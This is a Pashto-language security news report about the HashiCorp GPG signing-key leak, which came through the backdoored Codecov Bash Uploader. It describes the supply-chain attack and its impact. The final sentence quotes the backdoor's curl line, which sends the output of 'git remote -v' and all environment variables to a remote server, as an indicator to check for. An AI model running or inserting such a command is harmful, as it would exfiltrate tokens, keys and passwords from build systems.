HashiCorp، د خلاصې سرچینې وسیلو د پراختیا لپاره پیژندل شوی Vagrant، Packer، Nomad او Terraform، د خصوصي GPG کیلي لیک اعلان کړ چې د ډیجیټل لاسلیکونو رامینځته کولو لپاره کارول کیږي چې د خپرونو تصدیق کوي. برید کوونکي چې د GPG کیلي ته یې لاس رسی ترلاسه کړی ممکن د سم ډیجیټل لاسلیک سره د تصدیق کولو له لارې د HashiCorp محصولاتو کې پټ بدلونونه رامینځته کړي. په ورته وخت کې، شرکت ویلي چې د پلټنې په جریان کې، د داسې بدلونونو د هڅو هیڅ نښه نه ده پیژندل شوې.
اوس مهال، جوړ شوی GPG کیلي لغوه شوې او د هغې په ځای کې نوې کیلي معرفي شوې. ستونزې یوازې د SHA256SUM او SHA256SUM.sig فایلونو په کارولو سره تایید اغیزه کړې، او د ریلیز.hashicorp.com له لارې چمتو شوي د لینکس DEB او RPM کڅوړو لپاره د ډیجیټل لاسلیکونو تولید اغیزه نه کوي، او همدارنګه د MacOS او وینډوز (AuthentiCode) لپاره د تایید میکانیزم خوشې کول. .
لیک په زیربنا کې د Codecov Bash Uploader (codecov-bash) سکریپټ کارولو له امله رامینځته شوی چې د دوامداره ادغام سیسټمونو څخه د پوښښ راپورونو ډاونلوډ کولو لپاره ډیزاین شوی. د کوډکوف شرکت باندې د برید په جریان کې، په ټاکل شوي سکریپټ کې یو شاته دروازه پټه شوې وه، چې له لارې یې پاسورډونه او د کوډ کولو کیلي د برید کونکي سرور ته لیږل شوي.
د هیک کولو لپاره ، برید کونکو د کوډکوف ډاکر عکس رامینځته کولو په پروسه کې د غلطۍ څخه ګټه پورته کړه ، کوم چې دوی ته اجازه ورکړه چې GCS (ګوګل کلاوډ ذخیره) ته د لاسرسي ډیټا استخراج کړي ، د کوډکوف څخه توزیع شوي د بش اپلوډر سکریپټ کې د بدلون لپاره اړین دي. ویب پاڼه بدلونونه د جنوري په 31 بیرته رامینځته شوي ، د دوه میاشتو لپاره ناڅرګند پاتې و او برید کونکو ته یې اجازه ورکړه چې د پیرودونکي دوامداره ادغام سیسټم چاپیریال کې زیرمه شوي معلومات استخراج کړي. د اضافه شوي ناوړه کوډ په کارولو سره ، برید کونکي کولی شي د ازمول شوي Git ذخیره کولو او ټولو چاپیریال متغیرونو په اړه معلومات ترلاسه کړي ، پشمول د ټوکنونو ، کوډ کولو کیلي او پاسورډونه چې د دوامداره ادغام سیسټمونو ته لیږدول شوي ترڅو د غوښتنلیک کوډونو ، زیرمو او خدماتو لکه ایمیزون ویب خدماتو او GitHub ته لاسرسی تنظیم کړي.
د مستقیم تلیفون سربیره، د کوډکوف باش اپلوډر سکریپټ د نورو اپلوډرانو د یوې برخې په توګه کارول کیده، لکه کوډکوف-ایکشن (ګیتوب)، کوډکوف-سرکلیسي-اورب او کوډکوف-بیټریز ګام، چې کاروونکي یې هم د ستونزې لخوا اغیزمن شوي. د codecov-bash او اړوند محصولاتو ټولو کاروونکو ته سپارښتنه کیږي چې د دوی زیربنا پلټنه وکړي، او همدارنګه د پاسورډونو او کوډ کولو کیلي بدل کړي. تاسو کولی شئ د کرښې curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// په شتون سره په سکریپټ کې د شاته دروازې شتون چیک کړئ /upload/v2 || ریښتیا
سرچینه: opennet.ru